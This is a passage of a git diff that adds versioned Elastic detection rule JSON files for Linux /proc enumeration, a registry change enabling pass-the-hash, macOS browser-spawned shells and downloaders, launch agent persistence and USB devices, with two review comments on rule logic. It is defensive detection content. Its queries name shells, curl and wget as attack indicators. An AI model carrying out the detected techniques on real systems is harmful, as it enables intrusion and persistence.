"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_6.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_6.json new file mode 100644 index 00000000000..c34d1072a61 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_6.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets.", + "from": "now-119m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Proc Pseudo File System Enumeration", + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : (\n ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status\n) and not process.parent.pid : 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "file.path", + "value": 100 + } + ], + "field": [ + "host.id", + "process.pid", + "process.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 6 + }, + "id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd_6", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_7.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_7.json new file mode 100644 index 00000000000..69fa83c01d3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_7.json 
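Review bot: The "description" in this hunk says the rule fires on "a rapid enumeration of 25 different proc cmd, stat, and exe files", but the "threshold" block sets the "cardinality" on file.path to 100, so an alert actually requires 100 distinct /proc paths from one host.id/process.pid/process.name within the 60m interval. One of the two should change so that what an analyst reads matches what triggers; the smallest edit is to reword the description to `"... a rapid enumeration of 100 different proc cmd, stat, and exe files ..."` (or lower the cardinality value if 25 was the intended sensitivity). The same mismatch is carried into the _7 version of this rule added in the next hunk. These JSON files appear to be exported from the upstream detection-rules repository, so the correction presumably belongs there and then re-exported rather than patched here.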
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets.", + "from": "now-119m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Proc Pseudo File System Enumeration", + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : (\n ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status\n) and not process.parent.pid : 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "file.path", + "value": 100 + } + ], + "field": [ + "host.id", + "process.pid", + "process.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 7 + }, + "id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd_7", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_7.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_7.json new file mode 100644 index 00000000000..af9e47a9fea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_7.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Account TokenFilter Policy Disabled", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"\\\\REGISTRY\\\\MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\") and\n registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439", + "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "07b1ef73-1fde-4a49-a34a-5dd40011b076", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": 
"Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "07b1ef73-1fde-4a49-a34a-5dd40011b076_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_8.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_8.json new file mode 100644 index 00000000000..8fd8fb2eceb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_8.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Account TokenFilter Policy Disabled", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"\\\\REGISTRY\\\\MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\") and\n registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439", + "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "07b1ef73-1fde-4a49-a34a-5dd40011b076", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + 
"name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "07b1ef73-1fde-4a49-a34a-5dd40011b076_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_106.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_106.json new file mode 100644 index 00000000000..47d1d60d0d2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_106.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a suspicious browser child process. Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Browser Child Process", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"Google Chrome\", \"Google Chrome Helper*\", \"firefox\", \"Opera\", \"Safari\", \"com.apple.WebKit.WebContent\", \"Microsoft Edge\") and\n process.name : (\"sh\", \"bash\", \"dash\", \"ksh\", \"tcsh\", \"zsh\", \"curl\", \"wget\", \"python*\", \"perl*\", \"php*\", \"osascript\", \"pwsh\") and\n process.command_line != null and\n not process.command_line : \"*/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate*\" and\n not process.args :\n (\n \"hw.model\",\n \"IOPlatformExpertDevice\",\n \"/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/*/Resources/install.sh\",\n \"--defaults-torrc\",\n \"*Chrome.app\",\n \"Framework.framework/Versions/*/Resources/keystone_promote_preflight.sh\",\n \"/Users/*/Library/Application Support/Google/Chrome/recovery/*/ChromeRecovery\",\n \"$DISPLAY\",\n \"*GIO_LAUNCHED_DESKTOP_FILE_PID=$$*\",\n \"/opt/homebrew/*\",\n \"/usr/local/*brew*\"\n )\n", + "references": [ + "https://objective-see.com/blog/blog_0x43.html", + "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "080bc66a-5d56-4d1f-8071-817671716db9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1189", + "name": "Drive-by Compromise", + "reference": "https://attack.mitre.org/techniques/T1189/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "080bc66a-5d56-4d1f-8071-817671716db9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_106.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_106.json new file mode 100644 index 00000000000..9e99be15b80 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_106.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can establish persistence by installing a new launch agent that executes at login by using launchd or launchctl to load a plist into the appropriate directories.", + "false_positives": [ + "Trusted applications persisting via LaunchAgent" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Launch Agent Creation or Modification and Immediate Loading", + "query": "sequence by host.id with maxspan=1m\n [file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.path : (\"/System/Library/LaunchAgents/*\", \"/Library/LaunchAgents/*\", \"/Users/*/Library/LaunchAgents/*\")\n ]\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "082e3f8c-6f80-485c-91eb-5b112cb79b28", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.001", + "name": "Launch Agent", + "reference": "https://attack.mitre.org/techniques/T1543/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "082e3f8c-6f80-485c-91eb-5b112cb79b28_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_106.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_106.json new file mode 100644 index 00000000000..a1f97e57e54 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_106.json 
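Review bot: The second step of the sequence in `query` only matches `process.args == "load"`, so a launch agent activated with the newer `launchctl bootstrap` verb would never complete the sequence even though the plist write in the first step is observed. If the rule is meant to cover current macOS tooling, `process.args in ("load", "bootstrap")` would close that gap without widening the first step. This file looks like a versioned export (`_106` suffix, no trailing newline), so the change presumably belongs in the upstream rule source with a version bump rather than in this JSON directly.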
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a launchd child process with a hidden file. An adversary can establish persistence by installing a new logon item, launch agent, or daemon that executes upon login.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Hidden Child Process of Launchd", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:.* and process.parent.executable:/sbin/launchd\n", + "references": [ + "https://objective-see.com/blog/blog_0x61.html", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "083fa162-e790-4d85-9aeb-4fea04188adb", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.001", + "name": "Launch Agent", + "reference": "https://attack.mitre.org/techniques/T1543/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "083fa162-e790-4d85-9aeb-4fea04188adb_106", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_3.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_3.json new file mode 100644 index 00000000000..33219c25d69 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_3.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies newly seen removable devices by device friendly name using registry modification events. While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Removable Device", + "new_terms_fields": [ + "registry.path" + ], + "query": "event.category:\"registry\" and host.os.type:\"windows\" and registry.value:\"FriendlyName\" and registry.path:*USBSTOR*\n", + "references": [ + "https://winreg-kb.readthedocs.io/en/latest/sources/system-keys/USB-storage.html", + "https://learn.microsoft.com/en-us/windows-hardware/drivers/usbcon/usb-device-specific-registry-settings" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" 